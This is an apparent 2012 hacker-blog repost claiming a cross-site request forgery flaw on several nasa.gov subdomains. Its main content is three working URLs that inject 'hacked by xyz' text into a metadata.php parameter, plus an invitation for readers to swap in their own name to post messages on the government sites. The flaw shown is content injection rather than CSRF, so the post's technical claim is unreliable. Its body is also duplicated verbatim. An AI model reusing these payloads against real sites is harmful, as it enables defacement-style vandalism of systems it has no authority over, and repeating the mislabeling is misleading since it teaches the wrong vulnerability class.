Cross site request forgery (CSRF) vulnerability on Nasa.gov Domains
Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user’s browser.
Read More about CSRF on wikipeida
so here is our new vulnerability
in This vulnerability we can show our message Like “Hacked By XYZ” on a particular websites by adding text in url,
see for example :
http://vho.nasa.gov/vxo/metadata.php?id=hacked%20by%20xyz%20www.devilscafe.in
http://vmo.nasa.gov/vxo/metadata.php?id=hacked%20by%20xyz%20www.devilscafe.in
http://vmo.gsfc.nasa.gov/vxo/metadata.php?id=hacked%20by%20xyz%20www.devilscafe.in
You can simple chnage hacked%20by%20XYZ%20 with your own name to show your message on nasa.gov !!
[Please don’t copy post without giving a Credit or source Link, Thanks]
Read More about CSRF on wikipeida
so here is our new vulnerability
in This vulnerability we can show our message Like “Hacked By XYZ” on a particular websites by adding text in url,
see for example :
http://vho.nasa.gov/vxo/metadata.php?id=hacked%20by%20xyz%20www.devilscafe.in
http://vmo.nasa.gov/vxo/metadata.php?id=hacked%20by%20xyz%20www.devilscafe.in
http://vmo.gsfc.nasa.gov/vxo/metadata.php?id=hacked%20by%20xyz%20www.devilscafe.in
You can simple chnage hacked%20by%20XYZ%20 with your own name to show your message on nasa.gov !!
[Please don’t copy post without giving a Credit or source Link, Thanks]
Read more: Cross site request forgery (CSRF) vulnerability on Nasa.gov Domains
Story added 8. April 2012, content source with full text you can find at link above.